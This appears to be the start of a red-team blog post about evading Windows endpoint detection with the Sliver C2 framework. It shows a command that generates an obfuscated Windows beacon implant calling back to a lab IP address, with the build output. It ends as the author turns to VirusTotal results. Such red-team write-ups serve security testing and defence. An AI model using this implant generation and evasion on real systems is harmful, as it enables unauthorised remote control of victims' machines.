Breaking into Windows: Attempting to bypass EDR with Sliver
Background
Sliver C2 is a pretty awesome alternative to Metasploit, developed by Bishop Fox:
Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. Sliver’s implants support C2 over Mutual TLS (mTLS), WireGuard, HTTP(S), and DNS and are dynamically compiled with per-binary asymmetric encryption keys.
You can create both a beacon and an implant. I'm going to be using a beacon as it is a lot stealthier:
$ sliver > generate beacon --http 192.168.56.1 --os windows --arch amd64 --format exe
[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 16s
[*] Implant saved to /home/cleck/MODERN_MIDWIFE.exe
If we throw this into VirusTotal we get: